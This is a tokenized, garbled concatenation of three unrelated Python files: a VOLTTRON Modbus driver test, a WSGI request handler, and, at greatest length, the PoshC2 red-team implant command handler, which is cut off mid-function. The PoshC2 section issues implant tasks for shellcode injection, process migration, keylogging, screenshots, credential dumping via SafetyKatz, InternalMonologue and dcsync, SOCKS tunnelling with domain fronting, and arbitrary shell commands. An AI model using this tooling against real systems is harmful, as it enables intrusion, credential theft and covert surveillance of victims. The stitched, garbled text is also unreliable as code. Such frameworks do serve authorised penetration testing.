POWER (kW)":64.0 "TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)":63.0 "TOTAL INSTANTANEOUS APPARENT POWER (kVA)":62.0 "TOTAL POWER FACTOR (-)":61.0 "AVERAGE VOLTAGE L-L (V)":60.0 "AVERAGE VOLTAGE L-N (V)":59.0 "AVERAGE CURRENT (A)":58.0 "FREQUENCY (Hz)":57.0 "TOTAL REAL POWER PRESENT DEMAND (kW)":56.0 "TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)":55.0 "TOTAL APPARENT POWER PRESENT DEMAND (kVA)":54.0 "TOTAL REAL POWER MAX. DEMAND IMPORT (kW)":53.0 "TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR)":52.0 "TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)":51.0 "TOTAL REAL POWER MAX. DEMAND EXPORT (kW)":50.0 "TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)":49.0 "TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA)":48.0 "PULSE COUNTER 1 (-)":47.0 "PULSE COUNTER 2 (-)":46.0 "ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)":45.0 "ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)":44.0 "ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)":43.0 "ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)":42.0 "ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)":41.0 "ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)":40.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)":39.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)":38.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)":37.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)":36.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)":35.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)":34.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)":33.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)":32.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)":31.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)":30.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)":29.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)":28.0 "ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)":27.0 "ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)":26.0 "ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)":25.0 "ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)":24.0 "ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)":23.0 "ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)":22.0 "REAL POWER PHASE A (kW)":21.0 "REAL POWER PHASE B (kW)":20.0 "REAL POWER PHASE C (kW)":19.0 "REACTIVE POWER PHASE A (kVAR)":18.0 "REACTIVE POWER PHASE B (kVAR)":17.0 "REACTIVE POWER PHASE C (kVAR)":16.0 "APPARENT POWER PHASE A (kVA)":15.0 "APPARENT POWER PHASE B (kVA)":14.0 "APPARENT POWER PHASE C (kVA)":13.0 "POWER FACTOR PHASE A (-)":12.0 "POWER FACTOR PHASE B (-)":11.0 "POWER FACTOR PHASE C (-)":10.0 "VOLTAGE PHASE A-B (V)":9.0 "VOLTAGE PHASE B-C (V)":8.0 "VOLTAGE PHASE A-C (V)":7.0 "VOLTAGE PHASE A-N (V)":6.0 "VOLTAGE PHASE B-N (V)":5.0 "VOLTAGE PHASE C-N (V)":4.0 "CURRENT PHASE A (A)":3.0 "CURRENT PHASE B (A)":2.0 "CURRENT PHASE C (A)":1.0}<line_sep>@pytest.fixture(scope="module")<def_stmt>agent request volttron_instance<block_start>""" Build PlatformDriverAgent, add modbus driver & csv configurations """<line_sep># Build platform driver agent md_agent=volttron_instance.build_agent(identity="test_md_agent")<line_sep>capabilities={'edit_config_store':{'identity':PLATFORM_DRIVER}}<line_sep>volttron_instance.add_capabilities(md_agent.core.publickey capabilities)<line_sep># Clean out platform driver configurations # wait for it to return before adding new config md_agent.vip.rpc.call('config.store' 'manage_delete_store' PLATFORM_DRIVER).get()<line_sep># Add driver configurations md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'devices/modbus_tk' jsonapi.dumps(DRIVER_CONFIG) config_type='json')<line_sep># Add csv configurations md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'modbus_tk.csv' REGISTRY_CONFIG_STRING config_type='csv')<line_sep>md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'modbus_tk_map.csv' REGISTER_MAP config_type='csv')<line_sep>platform_uuid=volttron_instance.install_agent(agent_dir=get_services_core("PlatformDriverAgent") config_file={} start=<true>)<line_sep>gevent.sleep(10)# wait for the agent to start and start the devices <def_stmt>stop <block_start>""" Stop platform driver agent """<line_sep>volttron_instance.stop_agent(platform_uuid)<line_sep>md_agent.core.stop()<block_end>request.addfinalizer(stop)<line_sep><return>md_agent<block_end>@pytest.fixture(scope='class')<def_stmt>modbus_server request<block_start>modbus_client=Catalog()['battery_meter'].get_class()<line_sep>server_process=Server(address=IP port=PORT)<line_sep>server_process.define_slave(1 modbus_client unsigned=<false>)<line_sep>server_process.start()<line_sep>time.sleep(1)<line_sep><yield>server_process<line_sep>time.sleep(1)<line_sep>server_process.stop()<block_end>@pytest.mark.usefixtures("modbus_server")<class_stmt>TestModbusTKDriver<block_start>""" Regression tests for the modbus_tk driver interface. """<def_stmt>get_point self agent device_name point_name<block_start>""" Issue a get_point RPC call for the named point and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @param point_name: The name of the point to query. @return: The actual reading value of the point name from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'get_point' device_name point_name).get(timeout=10)<block_end><def_stmt>set_point self agent device_name point_name point_value<block_start>""" Issue a set_point RPC call for the named point and value, and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @param point_name: The name of the point to query. @param point_value: The value to set on the point. @return:The actual reading value of the point name from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'set_point' device_name point_name point_value).get(timeout=10)<block_end><def_stmt>scrape_all self agent device_name<block_start>""" Issue a get_point RPC call for the device and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @return: The dictionary mapping point names to their actual values from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'scrape_all' device_name).get(timeout=10)<block_end><def_stmt>test_scrape_all self agent<block_start><for_stmt>key registers_dict.keys()<block_start>self.set_point(agent 'modbus_tk' key registers_dict[key])<assert_stmt>self.get_point(agent 'modbus_tk' key)<eq>registers_dict[key]<block_end><assert_stmt>type(self.scrape_all(agent 'modbus_tk'))<is>dict<block_end><block_end>
<def_stmt>response_handler environ start_response<block_start>"""The WSGI Application Server. Arguments: environ {dict} -- The WSGI environ dictionary start_response {WSGI callable} Returns: WSGI Response """<import_from_stmt>wsgi application<line_sep>application.bind("environ" environ)<line_sep>"""Add Environ To Service Container Add the environ to the service container. The environ is generated by the the WSGI server above and used by a service provider to manipulate the incoming requests """<line_sep># """Execute All Service Providers That Require The WSGI Server # Run all service provider boot methods if the wsgi attribute is true. # """ <try_stmt><block_start><for_stmt>provider application.get_providers()<block_start>application.resolve(provider.boot)<block_end><block_end><except_stmt>Exception<as>e<block_start>application.make("exception_handler").handle(e)<block_end>"""We Are Ready For Launch If we have a solid response and not redirecting then we need to return a 200 status code along with the data. If we don't, then we'll have to return a 302 redirection to where ever the user would like go to next. """<line_sep>_,response=application.make("request") application.make("response")<line_sep>start_response(response.get_status_code() response.get_headers()+response.cookie_jar.render_response() )<line_sep>"""Final Step This will take the data variable from the Service Container and return it to the WSGI server. """<line_sep><return>iter([response.get_response_content()])<block_end><def_stmt>testcase_handler application environ start_response exception_handling=<true><block_start>"""The WSGI Application Server. Arguments: environ {dict} -- The WSGI environ dictionary start_response {WSGI callable} Returns: WSGI Response """<import_from_stmt>wsgi application<line_sep>application.bind("environ" environ)<line_sep>"""Add Environ To Service Container Add the environ to the service container. The environ is generated by the the WSGI server above and used by a service provider to manipulate the incoming requests """<line_sep># """Execute All Service Providers That Require The WSGI Server # Run all service provider boot methods if the wsgi attribute is true. # """ <try_stmt><block_start><for_stmt>provider application.get_providers()<block_start>application.resolve(provider.boot)<block_end><block_end><except_stmt>Exception<as>e<block_start><if_stmt><not>exception_handling<block_start><raise>e<block_end>application.make("exception_handler").handle(e)<block_end>"""We Are Ready For Launch If we have a solid response and not redirecting then we need to return a 200 status code along with the data. If we don't, then we'll have to return a 302 redirection to where ever the user would like go to next. """<line_sep>request,response=application.make("request") application.make("response")<line_sep>start_response(response.get_status_code() response.get_headers()+response.cookie_jar.render_response() )<line_sep>"""Final Step This will take the data variable from the Service Container and return it to the WSGI server. """<line_sep><return>(request response)<block_end>
<import_stmt>base64 re traceback os string subprocess<import_from_stmt>prompt_toolkit PromptSession<import_from_stmt>prompt_toolkit.history FileHistory<import_from_stmt>prompt_toolkit.auto_suggest AutoSuggestFromHistory<import_from_stmt>prompt_toolkit.styles Style<import_from_stmt>poshc2.client.Alias cs_alias cs_replace<import_from_stmt>poshc2.Colours Colours<import_from_stmt>poshc2.server.AutoLoads check_module_loaded run_autoloads_sharp<import_from_stmt>poshc2.client.Help sharp_help allhelp<import_from_stmt>poshc2.server.Config PoshInstallDirectory PoshProjectDirectory SocksHost PayloadsDirectory ModulesDirectory<import_from_stmt>poshc2.server.Config PayloadCommsHost DomainFrontHeader UserAgent PBindPipeName PBindSecret FCommFileName<import_from_stmt>poshc2.Utils argp load_file gen_key get_first_url get_first_dfheader<import_from_stmt>poshc2.server.Core print_bad print_good<import_from_stmt>poshc2.client.cli.CommandPromptCompleter FilePathCompleter<import_from_stmt>poshc2.server.payloads.Payloads Payloads<import_from_stmt>poshc2.server.PowerStatus getpowerstatus<import_from_stmt>poshc2.server.database.DB hide_implant new_task kill_implant get_implantdetails get_sharpurls get_baseenckey get_powerstatusbyrandomuri<import_from_stmt>poshc2.server.database.DB select_item update_label get_allurls get_c2server_all get_newimplanturl new_urldetails<def_stmt>handle_sharp_command command user randomuri implant_id# alias mapping <block_start><for_stmt>alias cs_alias<block_start><if_stmt>alias[0]<eq>command[:len(command.rstrip())]<block_start>command=alias[1]<block_end><block_end># alias replace <for_stmt>alias cs_replace<block_start><if_stmt>command.startswith(alias[0])<block_start>command=command.replace(alias[0] alias[1])<block_end><block_end>original_command=command<line_sep>command=command.strip()<line_sep>run_autoloads_sharp(command randomuri user)<if_stmt>command.startswith("searchhelp")<block_start>do_searchhelp(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("searchallhelp")<block_start>do_searchallhelp(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("searchhistory")<block_start>do_searchhistory(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("upload-file")<block_start>do_upload_file(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("inject-shellcode")<block_start>do_inject_shellcode(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("migrate")<block_start>do_migrate(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"kill-process"<block_start>do_kill_process(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"kill-implant"<or>command<eq>"exit"<block_start>do_kill_implant(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("sharpsocks")<block_start>do_sharpsocks(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("stop-keystrokes"))<block_start>do_stop_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("start-keystrokes"))<block_start>do_start_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-keystrokes"))<block_start>do_get_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-screenshotmulti"))<block_start>do_get_screenshotmulti(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("get-screenshot")<block_start>do_get_screenshot(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"getpowerstatus"<block_start>do_get_powerstatus(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"stoppowerstatus"<block_start>do_stoppowerstatus(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("run-exe SharpWMI.Program")<and>"execute"<in>command<and>"payload"<not><in>command<block_start>do_sharpwmi_execute(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-hash"))<block_start>do_get_hash(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("enable-rotation"))<block_start>do_rotation(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("safetykatz"))<block_start>do_safetykatz(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("loadmoduleforce")<block_start>do_loadmoduleforce(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("loadmodule")<block_start>do_loadmodule(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("listmodules")<block_start>do_listmodules(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("modulesloaded")<block_start>do_modulesloaded(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("pbind-connect")<block_start>do_pbind_start(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("fcomm-connect")<block_start>do_fcomm_start(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("dynamic-code")<block_start>do_dynamic_code(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("startdaisy")<block_start>do_startdaisy(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("dcsync")<block_start>do_dcsync(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"help"<block_start>do_help(user command randomuri)<line_sep><return><block_end><else_stmt><block_start><if_stmt>command<block_start>do_shell(user original_command randomuri)<block_end><return><block_end><block_end><def_stmt>do_searchhelp user command randomuri<block_start>searchterm=(command).replace("searchhelp " "")<line_sep>helpful=sharp_help.split('\n')<for_stmt>line helpful<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line)<block_end><block_end><block_end><def_stmt>do_searchallhelp user command randomuri<block_start>searchterm=(command).replace("searchallhelp " "")<for_stmt>line allhelp<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line)<block_end><block_end><block_end><def_stmt>do_searchhistory user command randomuri<block_start>searchterm=(command).replace("searchhistory " "")<with_stmt>open('%s/.implant-history'%PoshProjectDirectory)<as>hisfile<block_start><for_stmt>line hisfile<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line.replace("+" ""))<block_end><block_end><block_end><block_end><def_stmt>do_upload_file user command randomuri# TODO lots of common code <block_start>source=""<line_sep>destination=""<if_stmt>command<eq>"upload-file"<block_start>style=Style.from_dict({'':'#80d130' })<line_sep>session=PromptSession(history=FileHistory('%s/.upload-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>source=session.prompt("Location file to upload: " completer=FilePathCompleter(PayloadsDirectory glob="*"))<line_sep>source=PayloadsDirectory+source<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><while_stmt><not>os.path.isfile(source)<block_start>print("File does not exist: %s"%source)<line_sep>source=session.prompt("Location file to upload: " completer=FilePathCompleter(PayloadsDirectory glob="*"))<line_sep>source=PayloadsDirectory+source<block_end>destination=session.prompt("Location to upload to: ")<block_end><else_stmt><block_start>args=argp(command)<line_sep>source=args.source<line_sep>destination=args.destination<block_end><try_stmt><block_start>destination=destination.replace("\\" "\\\\")<line_sep>print("")<line_sep>print("Uploading %s to %s"%(source destination))<line_sep>uploadcommand=f"upload-file {source} {destination}"<line_sep>new_task(uploadcommand user randomuri)<block_end><except_stmt>Exception<as>e<block_start>print("Error with source file: %s"%e)<line_sep>traceback.print_exc()<block_end><block_end><def_stmt>do_inject_shellcode user command randomuri<block_start>params=re.compile("inject-shellcode" re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>style=Style.from_dict({'':'#80d130' })<line_sep>session=PromptSession(history=FileHistory('%s/.shellcode-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>path=session.prompt("Location of shellcode file: " completer=FilePathCompleter(PayloadsDirectory glob="*.bin"))<line_sep>path=PayloadsDirectory+path<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><try_stmt><block_start>shellcodefile=load_file(path)<if_stmt>shellcodefile<is><not><none><block_start>new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s"%(base64.b64encode(shellcodefile).decode("utf-8") params os.path.basename(path)) user randomuri)<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Error loading file: %s"%e)<block_end><block_end><def_stmt>do_migrate user command randomuri<block_start>params=re.compile("migrate" re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>implant=get_implantdetails(randomuri)<line_sep>implant_arch=implant.Arch<line_sep>implant_comms=implant.Pivot<if_stmt>implant_arch<eq>"AMD64"<block_start>arch="64"<block_end><else_stmt><block_start>arch="86"<block_end><if_stmt>implant_comms<eq>"C#"<block_start>path="%sSharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory arch)<line_sep>shellcodefile=load_file(path)<block_end><elif_stmt>"Daisy"<in>implant_comms<block_start>daisyname=input("Name required: ")<line_sep>path="%s%sSharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory daisyname arch)<line_sep>shellcodefile=load_file(path)<block_end><elif_stmt>"Proxy"<in>implant_comms<block_start>path="%sProxySharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory arch)<line_sep>shellcodefile=load_file(path)<block_end>new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s"%(base64.b64encode(shellcodefile).decode("utf-8") params os.path.basename(path)) user randomuri)<block_end><def_stmt>do_kill_process user command randomuri<block_start>impid=get_implantdetails(randomuri)<line_sep>print_bad("**OPSEC Warning** - kill-process will terminate the entire process, if you want to kill the thread only use kill-implant")<line_sep>ri=input("Are you sure you want to terminate the implant ID %s? (Y/n) "%impid.ImplantID)<if_stmt>ri.lower()<eq>"n"<block_start>print("Implant not terminated")<block_end><if_stmt>ri<eq>""<or>ri.lower()<eq>"y"<block_start>pid=impid.PID<line_sep>new_task("kill-process %s"%(pid) user randomuri)<line_sep>kill_implant(randomuri)<block_end><block_end><def_stmt>do_kill_implant user command randomuri<block_start>impid=get_implantdetails(randomuri)<line_sep>print_bad("**OPSEC Warning** - kill-implant terminates the current threat not the entire process, if you want to kill the process use kill-process")<line_sep>ri=input("Are you sure you want to terminate the implant ID %s? (Y/n) "%impid.ImplantID)<if_stmt>ri.lower()<eq>"n"<block_start>print("Implant not terminated")<block_end><if_stmt>ri<eq>""<or>ri.lower()<eq>"y"<block_start>pid=impid.PID<line_sep>new_task("exit" user randomuri)<line_sep>kill_implant(randomuri)<block_end><block_end><def_stmt>do_exit user command randomuri<block_start><return>do_kill_implant(user command randomuri)<block_end><def_stmt>do_sharpsocks user command randomuri<block_start>style=Style.from_dict({'':'#80d130' })<import_from_stmt>random choice<line_sep>channel="".join(choice(string.ascii_letters)<for>_ range(25))<line_sep>sharp_key=gen_key().decode("utf-8")<line_sep>default_sharp_urls=get_sharpurls()<line_sep>urls_prompt=PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.comma-separated-urls-history') auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>socks_proxy_urls=urls_prompt.prompt(f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ' '')}: ")<if_stmt><not>socks_proxy_urls<block_start>socks_proxy_urls=default_sharp_urls<block_end>socks_proxy_urls=socks_proxy_urls.split(",")<if_stmt>len(socks_proxy_urls)<l>2<block_start>print("Please specify at least two URIs")<line_sep><return><block_end>socks_proxy_urls=[i.replace("\"" "").strip()<for>i socks_proxy_urls]<line_sep>socks_proxy_urls=[(i[1:]<if>i.startswith("/")<else>i)<for>i socks_proxy_urls]<line_sep>default_sharp_url=select_item("PayloadCommsHost" "C2Server").replace('"' '').split(',')[0]<line_sep>domains_prompt=PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.protocol-and-domain-history') auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>sharp_url=domains_prompt.prompt(f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: ")<if_stmt><not>sharp_url<block_start>sharp_url=default_sharp_url<block_end><if_stmt><not>sharp_url.startswith("http")<block_start>print("Please specify a protocol (http/https)")<line_sep><return><block_end>default_host_header=get_first_dfheader(select_item("DomainFrontHeader" "C2Server"))<line_sep>host_headers_prompt=PromptSession(history=FileHistory('%s/.host-headers-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>host_header=host_headers_prompt.prompt(f"What host header should used? Default is {default_host_header}: ")<if_stmt><not>host_header<block_start>host_header=default_host_header<block_end>default_user_agent=select_item("UserAgent" "C2Server")<line_sep>user_agent_prompt=PromptSession(history=FileHistory('%s/.user-agents-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>user_agent=user_agent_prompt.prompt(f"What user agent? Default is \"{default_user_agent}\": ")<if_stmt><not>user_agent<block_start>user_agent=default_user_agent<block_end>default_beacon="200"<line_sep>beacon_prompt=PromptSession(history=FileHistory('%s/.beacon-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>beacon=beacon_prompt.prompt(f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: ")<if_stmt><not>beacon<block_start>beacon=default_beacon<block_end><if_stmt>beacon.strip().endswith("ms")<block_start>beacon=beacon.replace("ms" "").strip()<block_end>server_command=f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"<if_stmt>" -v"<in>command<or>" --verbose"<in>command<block_start>server_command<augadd>" --verbose"<block_end>server_command<augadd>"\n"<line_sep>print(Colours.GREEN+"\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n")<line_sep>print(server_command)<line_sep>task=f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""<if_stmt>host_header<block_start>task<augadd>f" -df {host_header}"<block_end>extra_args=command.replace("sharpsocks " "").strip()<if_stmt>extra_args<block_start>task<augadd>" "+extra_args<block_end>confirm=input("Are you ready to start the SharpSocks in the implant? (Y/n) ")<if_stmt>confirm<eq>""<or>confirm.lower()<eq>"y"<block_start>new_task(task user randomuri)<block_end><else_stmt><block_start>print("Aborted...")<line_sep><return><block_end>print("SharpSocks task issued, to stop SharpSocks run stopsocks")<block_end><def_stmt>do_stop_keystrokes user command randomuri<block_start>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<line_sep>update_label("" randomuri)<block_end><def_stmt>do_start_keystrokes user command randomuri<block_start>check_module_loaded("Logger.exe" randomuri user)<line_sep>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<line_sep>update_label("KEYLOG" randomuri)<block_end><def_stmt>do_get_keystrokes user command randomuri<block_start>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<block_end><def_stmt>do_get_screenshotmulti user command randomuri<block_start>pwrStatus=get_powerstatusbyrandomuri(randomuri)<if_stmt>(pwrStatus<is><not><none><and>pwrStatus[7])<block_start>ri=input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")<if_stmt>ri.lower()<eq>"n"<or>ri.lower()<eq>""<block_start><return><block_end><block_end>new_task(command user randomuri)<line_sep>update_label("SCREENSHOT" randomuri)<block_end><def_stmt>do_get_screenshot user command randomuri<block_start>pwrStatus=get_powerstatusbyrandomuri(randomuri)<if_stmt>(pwrStatus<is><not><none><and>pwrStatus[7])<block_start>ri=input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")<if_stmt>ri.lower()<eq>"n"<or>ri.lower()<eq>""<block_start><return><block_end><block_end>new_task(command user randomuri)<block_end><def_stmt>do_get_powerstatus user command randomuri<block_start>getpowerstatus(randomuri)<line_sep>new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult " user randomuri)<block_end><def_stmt>do_stoppowerstatus user command randomuri<block_start>new_task(command user randomuri)<line_sep>update_label("" randomuri)<block_end><def_stmt>do_get_hash user command randomuri<block_start>check_module_loaded("InternalMonologue.exe" randomuri user)<line_sep>new_task("run-exe InternalMonologue.Program InternalMonologue" user randomuri)<block_end><def_stmt>do_safetykatz user command randomuri<block_start>new_task("run-exe SafetyKatz.Program %s"%command user randomuri)<block_end><def_stmt>do_loadmoduleforce user command randomuri<block_start>params=re.compile("loadmoduleforce " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>check_module_loaded(params randomuri user force=<true>)<block_end><def_stmt>do_loadmodule user command randomuri<block_start>params=re.compile("loadmodule " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>check_module_loaded(params randomuri user)<block_end><def_stmt>do_listmodules user command randomuri<block_start>modules=os.listdir(ModulesDirectory)<line_sep>modules=sorted(modules key=<lambda>s:s.lower())<line_sep>print("")<line_sep>print("[+] Available modules:")<line_sep>print("")<for_stmt>mod modules<block_start><if_stmt>(".exe"<in>mod)<or>(".dll"<in>mod)<block_start>print(mod)<block_end><block_end><block_end><def_stmt>do_modulesloaded user command randomuri<block_start>implant_details=get_implantdetails(randomuri)<line_sep>print(implant_details.ModsLoaded)<line_sep>new_task("listmodules" user randomuri)<block_end><def_stmt>do_help user command randomuri<block_start>print(sharp_help)<block_end><def_stmt>do_shell user command randomuri<block_start>new_task(command user randomuri)<block_end><def_stmt>do_rotation user command randomuri<block_start>domain=input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")<line_sep>domainfront=input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")<line_sep>new_task("dfupdate %s"%domainfront user randomuri)<line_sep>new_task("rotate %s"%domain user randomuri)<block_end><def_stmt>do_sharpwmi_execute user command randomuri<block_start>style=Style.from_dict({'':'#80d130'})<line_sep>session=PromptSession(history=FileHistory('%s/.shellcode-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>path=session.prompt("Location of base64 vbs/js file: " completer=FilePathCompleter(PayloadsDirectory glob="*.b64"))<line_sep>path=PayloadsDirectory+path<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><if_stmt>os.path.isfile(path)<block_start><with_stmt>open(path "r")<as>p<block_start>payload=p.read()<block_end>new_task("%s payload=%s"%(command payload) user randomuri)<block_end><else_stmt><block_start>print_bad("Could not find file")<block_end><block_end><def_stmt>do_pbind_start user command randomuri<block_start>key=get_baseenckey()<if_stmt>len(command.split())<eq>2# 'pbind-connect <hostname>' is two args <block_start>command=f"{command} {PBindPipeName} {PBindSecret} {key}"<block_end><elif_stmt>len(command.split())<eq>4# if the pipe name and secret are already present just add the key <block_start>command=f"{command} {key}"<block_end><else_stmt><block_start>print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")<line_sep><return><block_end>new_task(command user randomuri)<block_end><def_stmt>do_fcomm_start user command randomuri<block_start>key=get_baseenckey()<if_stmt>len(command.split())<eq>1# 'fcomm-connect' is one args <block_start>command=f"{command} {FCommFileName} {key}"<block_end><elif_stmt>len(command.split())<eq>2# if the file name is already there then just add the key <block_start>command=f"{command} {key}"<block_end><else_stmt><block_start>print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")<line_sep><return><block_end>new_task(command user randomuri)<block_end><def_stmt>do_dynamic_code user command randomuri<block_start>compile_command="mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4"%(PayloadsDirectory PayloadsDirectory)<try_stmt><block_start>subprocess.check_output(compile_command shell=<true>)<block_end><except_stmt>subprocess.CalledProcessError<block_start><return><block_end>command=command.replace("dynamic-code" "").strip()<line_sep>check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe" randomuri user force=<true>)<line_sep>new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}" user randomuri)<block_end><def_stmt>do_startdaisy user command randomuri<block_start>check_module_loaded("daisy.dll" randomuri user)<line_sep>elevated=input(Colours.GREEN+"Are you elevated? Y/n "+Colours.END)<line_sep>domain_front=""<line_sep>proxy_user=""<line_sep>proxy_pass=""<line_sep>proxy_url=""<line_sep>cred_expiry=""<if_stmt>elevated.lower()<eq>"n"<block_start>cont=input(Colours.RED+"Daisy from an unelevated context can only bind to localhost, continue? y/N "+Colours.END)<if_stmt>cont.lower()<eq>"n"<or>cont<eq>""<block_start><return><block_end>bind_ip="localhost"<block_end><else_stmt><block_start>bind_ip=input(Colours.GREEN+"Bind IP on the daisy host: "+Colours.END)<block_end>bind_port=input(Colours.GREEN+"Bind Port on the daisy host: "+Colours.END)<line_sep>firstdaisy=input(Colours.GREEN+"Is this the first daisy in the 